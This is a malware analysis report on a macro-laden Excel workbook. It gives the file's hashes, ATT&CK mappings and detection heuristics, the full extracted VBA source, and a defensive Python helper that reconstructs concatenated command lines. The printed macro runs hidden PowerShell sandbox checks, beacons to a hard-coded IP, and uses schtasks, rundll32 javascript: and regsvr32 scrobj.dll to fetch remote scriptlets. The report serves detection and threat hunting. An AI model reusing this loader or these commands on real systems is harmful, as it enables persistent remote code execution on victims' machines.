Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8fb634785c78cb4b…

MALICIOUS

Office (OOXML)

Size: 22.7 KB
Created: 2018-09-16 22:52:21 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2019-02-26
MD5: 3c5926b63b8b7df78ae4d493bdc9b9fa
SHA-1: 486ccf480d6c5251eb09f25719b6a30c87a7b485
SHA-256: 8fb634785c78cb4b83ac2f5ae394d90a338efbcad2dc4e2a5cf4e26e106774e4
Risk Score: 510

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1204.002 User Execution: Malicious File

The ThisWorkbook module contains a Workbook_Open macro that fires when the workbook is opened with macros enabled. It calls GetInputs(), which runs hidden PowerShell one-liners (powershell -nop -w hidden -c ...) through a WScript.Shell.Exec wrapper (ShellRun) to count running processes, count distinct process names, and test whether the WMI owner of csrss.exe and explorer.exe can be resolved (encoded as usr=4 or usr=1). The 'Get boxed' comment and the choice of data mark this as sandbox/VM fingerprinting rather than general system-information theft. The values are written to Sheet1 cells D4, E4 and F4 and sent with MSXML2.XMLHTTP as a GET request to http://18.224.199.137/check.php?pc=<count>&upc=<count>&usr=<flag>, with a spoofed User-Agent (MSIE 6.0 / Windows NT 5.0, an anachronism on an Office 16 host and a useful proxy-log indicator). The response is read but never used in the visible code, so this stage is a check-in beacon. The PowerShell is plain, not obfuscated; the only evasion in the sample is string splitting of the LOLBin names ("regs" & "vr32.exe", "scro" & "bj.dll") in the second routine.

That second routine, Sub Workbook_Close, sets up persistence: schtasks /create registers a task named "wub wub" that runs every 10 minutes and launches rundll32 with a javascript: URL (the mshtml,RunHTMLApplication technique) whose script calls GetObject("script:http://update.bongos-dropbox.com/images/rtf/logo33_bak.ico"), and regsvr32 /s /n /u /i:http://update.upload-dropbox.com/images/rtf/logo33.ico scrobj.dll loads a second remote scriptlet (Squiblydoo). Both URLs must serve COM scriptlet (XML) content for these loaders to work; the .ico extensions are cosmetic. Two caveats for the analyst: neither remote payload was retrieved in this static analysis, so the second stage is unknown; and Workbook_Close is not a recognised Excel workbook event (the close handler is Workbook_BeforeClose) and nothing in the extracted source calls it, so as written this persistence stage would not run automatically. The combination of VBA auto-execution, WScript.Shell, hidden PowerShell and LOLBin proxy execution supports the malicious verdict.

Heuristics 11

  • ClamAV: Xls.Malware.Pwshell-6819163-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Pwshell-6819163-0
  • VBA project inside OOXML medium (8 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA. The matched line is only a comment; the actual shell invocations are oShell.Exec(sCmd) in ShellRun() and the two oShell.Run calls in Workbook_Close().
    Matched line in script
        'Run a shell command, returning the output as a string
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim oShell As Object
        Set oShell = CreateObject("WScript.Shell")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        'Get boxed
        pc = ShellRun("powershell -nop -w hidden -c (ps).count")
        upc = ShellRun("powershell -nop -w hidden -c get-process | sort-object | select -exp processname | get-unique | measure | select -exp count")
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        oShell.Run "schtasks /create /sc MINUTE /tn ""wub wub"" /tr " & _
                   """rundll32 javascript:\""\..\mshtml,RunHTMLApplication \"";document.write();try{GetObject(\""script:http://update.bongos-dropbox.com/images/rtf/logo33_bak.ico\"");}catch(e){};window.close()""" & _
                   " /mo 10 /F""", 0
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim objHTTP, res
        Set objHTTP = CreateObject("MSXML2.XMLHTTP")
        objHTTP.Open "GET", "http://18.224.199.137/check.php?" & pb, False
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        oShell.Run "schtasks /create /sc MINUTE /tn ""wub wub"" /tr " & _
                   """rundll32 javascript:\""\..\mshtml,RunHTMLApplication \"";document.write();try{GetObject(\""script:http://update.bongos-dropbox.com/images/rtf/logo33_bak.ico\"");}catch(e){};window.close()""" & _
                   " /mo 10 /F""", 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
        Attribute VB_Customizable = True
        Private Sub Workbook_Open()
            On Error Resume Next
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All three URLs also appear as string literals in the extracted macro source below.
    • http://18.224.199.137/check.php   In document text (OOXML body / shared strings)
    • http://update.bongos-dropbox.com/images/rtf/logo33_bak.ico   In document text (OOXML body / shared strings)
    • http://update.upload-dropbox.com/images/rtf/logo33.ico   In document text (OOXML body / shared strings)
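The two oShell.Run statements in Workbook_Close spread each command line over `& _` continuations and split the binary names into fragments ("regs" & "vr32.exe", "scro" & "bj.dll"), which is enough to defeat a naive grep of the macro source for regsvr32 or scrobj.dll. The Python below is an added triage helper, not part of this report's tooling or of the sample: it joins VBA line continuations, evaluates the string-literal concatenation (including VBA's doubled-quote escape), tags each recovered command line with the LOLBin and persistence patterns it uses, and lists the URLs it reaches. The input is the relevant statements copied from the extracted macro shown in this report; the tag names and regexes are my own.

```python
"""Added triage helper: recover command lines that a VBA macro assembles from
concatenated string literals and line continuations, then tag the LOLBin and
persistence patterns they use. Not part of the analysis tooling or the sample."""
import re

# Constructed input: the ShellRun() call and the two oShell.Run statements copied
# from the macro source extracted in this report (GetInputs and Workbook_Close).
# The surrounding Sub/Function lines are omitted.
MACRO_SNIPPET = r'''
    pc = ShellRun("powershell -nop -w hidden -c (ps).count")
    oShell.Run "schtasks /create /sc MINUTE /tn ""wub wub"" /tr " & _
               """rundll32 javascript:\""\..\mshtml,RunHTMLApplication \"";document.write();try{GetObject(\""script:http://update.bongos-dropbox.com/images/rtf/logo33_bak.ico\"");}catch(e){};window.close()""" & _
               " /mo 10 /F""", 0
    oShell.Run "regs" & _
               "vr32.exe /s /n /u /i:http://update.upload-dropbox.com/images/rtf/logo33.ico scro" & _
               "bj.dll", 0
'''

# Call sites whose first argument is the command string: WScript.Shell .Run/.Exec
# and the sample's own ShellRun() wrapper.
CALL_HEAD = re.compile(r"(?i)(?:\.Run|\.Exec|\bShellRun)\s*\(?\s*")

# Tag names are my own; the patterns describe the techniques seen in this sample.
LOLBIN_PATTERNS = {
    "schtasks persistence": re.compile(r"(?i)\bschtasks(\.exe)?\b.*\s/create\b"),
    "rundll32 javascript: (mshtml RunHTMLApplication)": re.compile(r"(?i)\brundll32(\.exe)?\b.*javascript:"),
    "GetObject script: moniker": re.compile(r"(?i)\bscript:https?://"),
    "regsvr32 scrobj.dll remote scriptlet": re.compile(r"(?i)\bregsvr32(\.exe)?\b.*/i:https?://.*\bscrobj\.dll\b"),
    "hidden PowerShell": re.compile(r"(?i)\bpowershell(\.exe)?\b.*-w(indowstyle)?\s+hidden"),
}
URL = re.compile(r"https?://[^\s\"'\\);]+")


def join_continuations(src):
    """Merge VBA physical lines ending in ' _' into single logical statements."""
    logical, buf = [], ""
    for line in src.splitlines():
        stripped = line.strip()
        if stripped.endswith(" _"):
            buf += stripped[:-1]          # drop the underscore, keep its leading space
            continue
        buf += stripped
        if buf:
            logical.append(buf)
        buf = ""
    return logical


def parse_string_expression(text, pos):
    """Evaluate a VBA expression of string literals joined by '&' starting at
    text[pos]. A quote inside a literal is written as "". Returns (value, end)."""
    parts, i = [], pos
    while True:
        while i < len(text) and text[i] == " ":
            i += 1
        if i >= len(text) or text[i] != '"':
            break
        i += 1
        chunk = []
        while i < len(text):
            if text[i] == '"':
                if i + 1 < len(text) and text[i + 1] == '"':   # escaped quote
                    chunk.append('"')
                    i += 2
                    continue
                i += 1                                          # closing quote
                break
            chunk.append(text[i])
            i += 1
        parts.append("".join(chunk))
        j = i
        while j < len(text) and text[j] == " ":
            j += 1
        if j < len(text) and text[j] == "&":                    # another operand follows
            i = j + 1
            continue
        break
    return "".join(parts), i


def extract_commands(src):
    """Return every fully reconstructed command string passed to a call site."""
    cmds = []
    for stmt in join_continuations(src):
        m = CALL_HEAD.search(stmt)
        if not m:
            continue
        value, _ = parse_string_expression(stmt, m.end())
        if value:
            cmds.append(value)
    return cmds


def classify(cmd):
    """Sorted list of technique tags whose pattern matches the command line."""
    return sorted(tag for tag, rx in LOLBIN_PATTERNS.items() if rx.search(cmd))


def triage(src):
    """One record per recovered command: the text, its tags and the URLs it reaches."""
    return [{"command": c, "tags": classify(c), "urls": URL.findall(c)}
            for c in extract_commands(src)]


if __name__ == "__main__":
    for rec in triage(MACRO_SNIPPET):
        print(rec["command"])
        print("   tags:", ", ".join(rec["tags"]) or "-")
        print("   urls:", ", ".join(rec["urls"]) or "-")
```

Run as a script it prints the three recovered command lines with their tags; the same functions work on a full olevba dump, since statements with no string-literal argument (such as the ShellRun definition or the oShell.Exec(sCmd) call) are skipped. The reconstructed regsvr32 line is the one to hunt for in process-creation telemetry, not the fragments that appear in the VBA source.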

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3568 bytes
SHA-256: 8aff54f291e4928f1b3c90dc02c0ee7bf342511ca8e41370da7022ff052745d1
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    On Error Resume Next
    pb = GetInputs()
    Dim objHTTP, res
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    objHTTP.Open "GET", "http://18.224.199.137/check.php?" & pb, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
    objHTTP.send (pb & o)
    res = objHTTP.responseText
    Set objHTTP = Nothing
    Set res = Nothing
End Sub


Public Function ShellRun(sCmd As String) As String

    'Run a shell command, returning the output as a string

    Dim oShell As Object
    Set oShell = CreateObject("WScript.Shell")

    'run command
    Dim oExec As Object
    Dim oOutput As Object
    Set oExec = oShell.Exec(sCmd)
    Set oOutput = oExec.StdOut

    'handle the results as they are written to and read from the StdOut object
    Dim s As String
    Dim sLine As String
    While Not oOutput.AtEndOfStream
        sLine = oOutput.ReadLine
        If sLine <> "" Then s = s & sLine & vbCrLf
    Wend

    ShellRun = s

End Function

Function GetInputs()
    Dim pc, upc, u, pb, uf As String
    
    'Get boxed
    pc = ShellRun("powershell -nop -w hidden -c (ps).count")
    upc = ShellRun("powershell -nop -w hidden -c get-process | sort-object | select -exp processname | get-unique | measure | select -exp count")
    
    'Getting user counts
    u = ShellRun("powershell -nop -w hidden -c (Get-WmiObject Win32_Process -ComputerName . | ?{ $_.ProcessName -Match 'csrss'}).GetOwner().User")
    u2 = ShellRun("powershell -nop -w hidden -c (Get-WmiObject Win32_Process -ComputerName . | ?{ $_.ProcessName -Match 'explorer'}).GetOwner().User")

    
    
    pc = CInt(pc)
    upc = CInt(upc)
    
    If Len(u) > 0 Then
        uf = 4
    End If
    
    If Len(u2) > 0 Then
        uf = 1
    End If
        
    ActiveWorkbook.Sheets("Sheet1").Range("F4").Value = uf
    ActiveWorkbook.Sheets("Sheet1").Range("D4").Value = pc
    ActiveWorkbook.Sheets("Sheet1").Range("E4").Value = upc

   
    usr = ActiveWorkbook.Sheets("Sheet1").Range("F4").Value
    
    pb = "pc=" & pc & "&upc=" & upc & "&usr=" & uf
    
    GetInputs = pb
    
End Function

Sub Workbook_Close()

    Dim oShell, office_text As String

    On Error Resume Next
    Set oShell = CreateObject("WSCript.shell")
    oShell.Run "schtasks /create /sc MINUTE /tn ""wub wub"" /tr " & _
               """rundll32 javascript:\""\..\mshtml,RunHTMLApplication \"";document.write();try{GetObject(\""script:http://update.bongos-dropbox.com/images/rtf/logo33_bak.ico\"");}catch(e){};window.close()""" & _
               " /mo 10 /F""", 0
    oShell.Run "regs" & _
               "vr32.exe /s /n /u /i:http://update.upload-dropbox.com/images/rtf/logo33.ico scro" & _
               "bj.dll", 0
    Set oShell = Nothing
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 24064 bytes
SHA-256: 49ded032e05409450c9258e35937b67d1e6ec2521bd3badd7ce96a7f0890796a
Detection: ClamAV Xls.Malware.Pwshell-6819163-0
Obfuscation or payload: unlikely